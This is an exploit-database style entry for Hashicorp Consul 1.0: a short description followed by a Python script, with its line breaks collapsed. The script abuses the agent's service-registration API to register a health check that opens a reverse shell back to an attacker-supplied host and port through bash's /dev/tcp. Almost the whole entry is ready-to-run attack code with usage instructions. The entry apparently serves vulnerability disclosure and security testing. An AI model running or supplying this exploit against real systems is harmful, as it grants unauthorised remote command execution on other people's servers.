Hashicorp Consul 1.0 Remote Command Execution
Hashicorp Consul version 1.0 suffers from a remote command execution vulnerability.
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)# Date: 26/10/2022# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://www.consul.io/# Description: Exploit for gain reverse shell on Remote Command Execution via API# References: https://www.consul.io/api/agent/service.html# Tested on: Ubuntu Server# Software Link: https://github.com/hashicorp/consulimport requests, sysif len(sys.argv) < 6: print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n") exit(1)target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"headers = {"X-Consul-Token": f"{sys.argv[5]}"}json = {"Address": "", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}try: requests.put(target, headers=headers, json=json) print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")except: print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")